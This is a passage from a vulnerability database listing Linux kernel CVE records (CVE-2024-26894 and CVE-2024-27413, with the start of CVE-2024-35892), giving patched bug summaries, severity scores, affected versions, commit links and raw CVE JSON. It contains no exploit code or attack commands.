ACPI: processor_idle: Fix memory leak in acpi_processor_power_exit()

Summary

In the Linux kernel, the following vulnerability has been resolved: ACPI: processor_idle: Fix memory leak in acpi_processor_power_exit() After unregistering the CPU idle device, the memory associated with it is not freed, leading to a memory leak: unreferenced object 0xffff896282f6c000 (size 1024): comm "swapper/0", pid 1, jiffies 4294893170 hex dump (first 32 bytes): 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace (crc 8836a742): [<ffffffff993495ed>] kmalloc_trace+0x29d/0x340 [<ffffffff9972f3b3>] acpi_processor_power_init+0xf3/0x1c0 [<ffffffff9972d263>] __acpi_processor_start+0xd3/0xf0 [<ffffffff9972d2bc>] acpi_processor_start+0x2c/0x50 [<ffffffff99805872>] really_probe+0xe2/0x480 [<ffffffff99805c98>] __driver_probe_device+0x78/0x160 [<ffffffff99805daf>] driver_probe_device+0x1f/0x90 [<ffffffff9980601e>] __driver_attach+0xce/0x1c0 [<ffffffff99803170>] bus_for_each_dev+0x70/0xc0 [<ffffffff99804822>] bus_add_driver+0x112/0x210 [<ffffffff99807245>] driver_register+0x55/0x100 [<ffffffff9aee4acb>] acpi_processor_driver_init+0x3b/0xc0 [<ffffffff990012d1>] do_one_initcall+0x41/0x300 [<ffffffff9ae7c4b0>] kernel_init_freeable+0x320/0x470 [<ffffffff99b231f6>] kernel_init+0x16/0x1b0 [<ffffffff99042e6d>] ret_from_fork+0x2d/0x50 Fix this by freeing the CPU idle device after unregistering it.

Severity ?

6 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H

CWE

CWE-770 - Allocation of Resources Without Limits or Throttling

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/d351bcadab6caa6d8…
	https://git.kernel.org/stable/c/ea96bf3f80625cddb…
	https://git.kernel.org/stable/c/c2a30c81bf3cb9033…
	https://git.kernel.org/stable/c/1cbaf4c793b080853…
	https://git.kernel.org/stable/c/fad9bcd4d754cc689…
	https://git.kernel.org/stable/c/3d48e5be107429ff5…
	https://git.kernel.org/stable/c/8d14a4d0afb49a5b8…
	https://git.kernel.org/stable/c/cd5c2d0b09d5b6d3f…
	https://git.kernel.org/stable/c/e18afcb7b2a12b635…

Impacted products

Vendor

Product

Version

Linux

Affected: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea , < d351bcadab6caa6d8ce7159ff4b77e2da35c09fa (git)
Affected: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea , < ea96bf3f80625cddba1391a87613356b1b45716d (git)
Affected: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea , < c2a30c81bf3cb9033fa9f5305baf7c377075e2e5 (git)
Affected: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea , < 1cbaf4c793b0808532f4e7b40bc4be7cec2c78f2 (git)
Affected: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea , < fad9bcd4d754cc689c19dc04d2c44b82c1a5d6c8 (git)
Affected: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea , < 3d48e5be107429ff5d824e7f2a00d1b610d36fbc (git)
Affected: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea , < 8d14a4d0afb49a5b8535d414c782bb334860e73e (git)
Affected: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea , < cd5c2d0b09d5b6d3f0a7bbabe6761a4997e9dee9 (git)
Affected: 3d339dcbb56d8d70c1b959aff87d74adc3a84eea , < e18afcb7b2a12b635ac10081f943fcf84ddacc51 (git)

Linux

Affected: 3.7
Unaffected: 0 , < 3.7 (semver)
Unaffected: 4.19.311 , ≤ 4.19.* (semver)
Unaffected: 5.4.273 , ≤ 5.4.* (semver)
Unaffected: 5.10.214 , ≤ 5.10.* (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.515Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d351bcadab6caa6d8ce7159ff4b77e2da35c09fa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ea96bf3f80625cddba1391a87613356b1b45716d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c2a30c81bf3cb9033fa9f5305baf7c377075e2e5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1cbaf4c793b0808532f4e7b40bc4be7cec2c78f2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fad9bcd4d754cc689c19dc04d2c44b82c1a5d6c8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3d48e5be107429ff5d824e7f2a00d1b610d36fbc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8d14a4d0afb49a5b8535d414c782bb334860e73e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cd5c2d0b09d5b6d3f0a7bbabe6761a4997e9dee9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e18afcb7b2a12b635ac10081f943fcf84ddacc51"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 6,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "NONE",
              "privilegesRequired": "HIGH",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26894",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-02-06T16:56:24.973748Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-770",
                "description": "CWE-770 Allocation of Resources Without Limits or Throttling",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-02-06T16:57:05.473Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/acpi/processor_idle.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "d351bcadab6caa6d8ce7159ff4b77e2da35c09fa",
              "status": "affected",
              "version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
              "versionType": "git"
            },
            {
              "lessThan": "ea96bf3f80625cddba1391a87613356b1b45716d",
              "status": "affected",
              "version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
              "versionType": "git"
            },
            {
              "lessThan": "c2a30c81bf3cb9033fa9f5305baf7c377075e2e5",
              "status": "affected",
              "version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
              "versionType": "git"
            },
            {
              "lessThan": "1cbaf4c793b0808532f4e7b40bc4be7cec2c78f2",
              "status": "affected",
              "version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
              "versionType": "git"
            },
            {
              "lessThan": "fad9bcd4d754cc689c19dc04d2c44b82c1a5d6c8",
              "status": "affected",
              "version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
              "versionType": "git"
            },
            {
              "lessThan": "3d48e5be107429ff5d824e7f2a00d1b610d36fbc",
              "status": "affected",
              "version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
              "versionType": "git"
            },
            {
              "lessThan": "8d14a4d0afb49a5b8535d414c782bb334860e73e",
              "status": "affected",
              "version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
              "versionType": "git"
            },
            {
              "lessThan": "cd5c2d0b09d5b6d3f0a7bbabe6761a4997e9dee9",
              "status": "affected",
              "version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
              "versionType": "git"
            },
            {
              "lessThan": "e18afcb7b2a12b635ac10081f943fcf84ddacc51",
              "status": "affected",
              "version": "3d339dcbb56d8d70c1b959aff87d74adc3a84eea",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/acpi/processor_idle.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.7"
            },
            {
              "lessThan": "3.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.311",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.273",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.214",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.311",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.273",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.214",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPI: processor_idle: Fix memory leak in acpi_processor_power_exit()\n\nAfter unregistering the CPU idle device, the memory associated with\nit is not freed, leading to a memory leak:\n\nunreferenced object 0xffff896282f6c000 (size 1024):\n  comm \"swapper/0\", pid 1, jiffies 4294893170\n  hex dump (first 32 bytes):\n    00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00  ................\n    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\n  backtrace (crc 8836a742):\n    [\u003cffffffff993495ed\u003e] kmalloc_trace+0x29d/0x340\n    [\u003cffffffff9972f3b3\u003e] acpi_processor_power_init+0xf3/0x1c0\n    [\u003cffffffff9972d263\u003e] __acpi_processor_start+0xd3/0xf0\n    [\u003cffffffff9972d2bc\u003e] acpi_processor_start+0x2c/0x50\n    [\u003cffffffff99805872\u003e] really_probe+0xe2/0x480\n    [\u003cffffffff99805c98\u003e] __driver_probe_device+0x78/0x160\n    [\u003cffffffff99805daf\u003e] driver_probe_device+0x1f/0x90\n    [\u003cffffffff9980601e\u003e] __driver_attach+0xce/0x1c0\n    [\u003cffffffff99803170\u003e] bus_for_each_dev+0x70/0xc0\n    [\u003cffffffff99804822\u003e] bus_add_driver+0x112/0x210\n    [\u003cffffffff99807245\u003e] driver_register+0x55/0x100\n    [\u003cffffffff9aee4acb\u003e] acpi_processor_driver_init+0x3b/0xc0\n    [\u003cffffffff990012d1\u003e] do_one_initcall+0x41/0x300\n    [\u003cffffffff9ae7c4b0\u003e] kernel_init_freeable+0x320/0x470\n    [\u003cffffffff99b231f6\u003e] kernel_init+0x16/0x1b0\n    [\u003cffffffff99042e6d\u003e] ret_from_fork+0x2d/0x50\n\nFix this by freeing the CPU idle device after unregistering it."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:59:04.768Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/d351bcadab6caa6d8ce7159ff4b77e2da35c09fa"
        },
        {
          "url": "https://git.kernel.org/stable/c/ea96bf3f80625cddba1391a87613356b1b45716d"
        },
        {
          "url": "https://git.kernel.org/stable/c/c2a30c81bf3cb9033fa9f5305baf7c377075e2e5"
        },
        {
          "url": "https://git.kernel.org/stable/c/1cbaf4c793b0808532f4e7b40bc4be7cec2c78f2"
        },
        {
          "url": "https://git.kernel.org/stable/c/fad9bcd4d754cc689c19dc04d2c44b82c1a5d6c8"
        },
        {
          "url": "https://git.kernel.org/stable/c/3d48e5be107429ff5d824e7f2a00d1b610d36fbc"
        },
        {
          "url": "https://git.kernel.org/stable/c/8d14a4d0afb49a5b8535d414c782bb334860e73e"
        },
        {
          "url": "https://git.kernel.org/stable/c/cd5c2d0b09d5b6d3f0a7bbabe6761a4997e9dee9"
        },
        {
          "url": "https://git.kernel.org/stable/c/e18afcb7b2a12b635ac10081f943fcf84ddacc51"
        }
      ],
      "title": "ACPI: processor_idle: Fix memory leak in acpi_processor_power_exit()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26894",
    "datePublished": "2024-04-17T10:27:45.960Z",
    "dateReserved": "2024-02-19T14:20:24.186Z",
    "dateUpdated": "2025-05-04T08:59:04.768Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27413 (GCVE-0-2024-27413)

Vulnerability from cvelistv5 – Published: 2024-05-17 11:50 – Updated: 2025-05-04 12:55

Title

efi/capsule-loader: fix incorrect allocation size

Summary

In the Linux kernel, the following vulnerability has been resolved: efi/capsule-loader: fix incorrect allocation size gcc-14 notices that the allocation with sizeof(void) on 32-bit architectures is not enough for a 64-bit phys_addr_t: drivers/firmware/efi/capsule-loader.c: In function 'efi_capsule_open': drivers/firmware/efi/capsule-loader.c:295:24: error: allocation of insufficient size '4' for type 'phys_addr_t' {aka 'long long unsigned int'} with size '8' [-Werror=alloc-size] 295 | cap_info->phys = kzalloc(sizeof(void *), GFP_KERNEL); | ^ Use the correct type instead here.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/00cf21ac526011a29…
	https://git.kernel.org/stable/c/950d4d74d311a18ba…
	https://git.kernel.org/stable/c/537e3f49dbe88881a…
	https://git.kernel.org/stable/c/4b73473c050a612fb…
	https://git.kernel.org/stable/c/ddc547dd05a467208…
	https://git.kernel.org/stable/c/11aabd7487857b8e7…
	https://git.kernel.org/stable/c/62a5dcd9bd3097e98…
	https://git.kernel.org/stable/c/fccfa646ef3628097…

Impacted products

Vendor

Product

Version

Linux

Affected: f24c4d478013d82bd1b943df566fff3561d52864 , < 00cf21ac526011a29fc708f8912da446fac19f7b (git)
Affected: f24c4d478013d82bd1b943df566fff3561d52864 , < 950d4d74d311a18baed6878dbfba8180d7e5dddd (git)
Affected: f24c4d478013d82bd1b943df566fff3561d52864 , < 537e3f49dbe88881a6f0752beaa596942d9efd64 (git)
Affected: f24c4d478013d82bd1b943df566fff3561d52864 , < 4b73473c050a612fb4317831371073eda07c3050 (git)
Affected: f24c4d478013d82bd1b943df566fff3561d52864 , < ddc547dd05a46720866c32022300f7376c40119f (git)
Affected: f24c4d478013d82bd1b943df566fff3561d52864 , < 11aabd7487857b8e7d768fefb092f66dfde68492 (git)
Affected: f24c4d478013d82bd1b943df566fff3561d52864 , < 62a5dcd9bd3097e9813de62fa6f22815e84a0172 (git)
Affected: f24c4d478013d82bd1b943df566fff3561d52864 , < fccfa646ef3628097d59f7d9c1a3e84d4b6bb45e (git)
Affected: 95a362c9a6892085f714eb6e31eea6a0e3aa93bf (git)

Linux

Affected: 4.15
Unaffected: 0 , < 4.15 (semver)
Unaffected: 4.19.309 , ≤ 4.19.* (semver)
Unaffected: 5.4.271 , ≤ 5.4.* (semver)
Unaffected: 5.10.212 , ≤ 5.10.* (semver)
Unaffected: 5.15.151 , ≤ 5.15.* (semver)
Unaffected: 6.1.81 , ≤ 6.1.* (semver)
Unaffected: 6.6.21 , ≤ 6.6.* (semver)
Unaffected: 6.7.9 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27413",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-17T17:39:33.014498Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-17T17:43:44.618Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:34:52.364Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/00cf21ac526011a29fc708f8912da446fac19f7b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/950d4d74d311a18baed6878dbfba8180d7e5dddd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/537e3f49dbe88881a6f0752beaa596942d9efd64"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4b73473c050a612fb4317831371073eda07c3050"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ddc547dd05a46720866c32022300f7376c40119f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/11aabd7487857b8e7d768fefb092f66dfde68492"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/62a5dcd9bd3097e9813de62fa6f22815e84a0172"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fccfa646ef3628097d59f7d9c1a3e84d4b6bb45e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/firmware/efi/capsule-loader.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "00cf21ac526011a29fc708f8912da446fac19f7b",
              "status": "affected",
              "version": "f24c4d478013d82bd1b943df566fff3561d52864",
              "versionType": "git"
            },
            {
              "lessThan": "950d4d74d311a18baed6878dbfba8180d7e5dddd",
              "status": "affected",
              "version": "f24c4d478013d82bd1b943df566fff3561d52864",
              "versionType": "git"
            },
            {
              "lessThan": "537e3f49dbe88881a6f0752beaa596942d9efd64",
              "status": "affected",
              "version": "f24c4d478013d82bd1b943df566fff3561d52864",
              "versionType": "git"
            },
            {
              "lessThan": "4b73473c050a612fb4317831371073eda07c3050",
              "status": "affected",
              "version": "f24c4d478013d82bd1b943df566fff3561d52864",
              "versionType": "git"
            },
            {
              "lessThan": "ddc547dd05a46720866c32022300f7376c40119f",
              "status": "affected",
              "version": "f24c4d478013d82bd1b943df566fff3561d52864",
              "versionType": "git"
            },
            {
              "lessThan": "11aabd7487857b8e7d768fefb092f66dfde68492",
              "status": "affected",
              "version": "f24c4d478013d82bd1b943df566fff3561d52864",
              "versionType": "git"
            },
            {
              "lessThan": "62a5dcd9bd3097e9813de62fa6f22815e84a0172",
              "status": "affected",
              "version": "f24c4d478013d82bd1b943df566fff3561d52864",
              "versionType": "git"
            },
            {
              "lessThan": "fccfa646ef3628097d59f7d9c1a3e84d4b6bb45e",
              "status": "affected",
              "version": "f24c4d478013d82bd1b943df566fff3561d52864",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "95a362c9a6892085f714eb6e31eea6a0e3aa93bf",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/firmware/efi/capsule-loader.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.15"
            },
            {
              "lessThan": "4.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.309",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.271",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.212",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.151",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.81",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.21",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.309",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.271",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.212",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.151",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.81",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.21",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.9",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.14.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nefi/capsule-loader: fix incorrect allocation size\n\ngcc-14 notices that the allocation with sizeof(void) on 32-bit architectures\nis not enough for a 64-bit phys_addr_t:\n\ndrivers/firmware/efi/capsule-loader.c: In function \u0027efi_capsule_open\u0027:\ndrivers/firmware/efi/capsule-loader.c:295:24: error: allocation of insufficient size \u00274\u0027 for type \u0027phys_addr_t\u0027 {aka \u0027long long unsigned int\u0027} with size \u00278\u0027 [-Werror=alloc-size]\n  295 |         cap_info-\u003ephys = kzalloc(sizeof(void *), GFP_KERNEL);\n      |                        ^\n\nUse the correct type instead here."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:55:41.446Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/00cf21ac526011a29fc708f8912da446fac19f7b"
        },
        {
          "url": "https://git.kernel.org/stable/c/950d4d74d311a18baed6878dbfba8180d7e5dddd"
        },
        {
          "url": "https://git.kernel.org/stable/c/537e3f49dbe88881a6f0752beaa596942d9efd64"
        },
        {
          "url": "https://git.kernel.org/stable/c/4b73473c050a612fb4317831371073eda07c3050"
        },
        {
          "url": "https://git.kernel.org/stable/c/ddc547dd05a46720866c32022300f7376c40119f"
        },
        {
          "url": "https://git.kernel.org/stable/c/11aabd7487857b8e7d768fefb092f66dfde68492"
        },
        {
          "url": "https://git.kernel.org/stable/c/62a5dcd9bd3097e9813de62fa6f22815e84a0172"
        },
        {
          "url": "https://git.kernel.org/stable/c/fccfa646ef3628097d59f7d9c1a3e84d4b6bb45e"
        }
      ],
      "title": "efi/capsule-loader: fix incorrect allocation size",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27413",
    "datePublished": "2024-05-17T11:50:53.780Z",
    "dateReserved": "2024-02-25T13:47:42.682Z",
    "dateUpdated": "2025-05-04T12:55:41.446Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35892 (GCVE-0-2024-35892)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2025-05-04 12:56

Title

net/sched: fix lockdep splat in qdisc_tree_reduce_backlog()

Summary

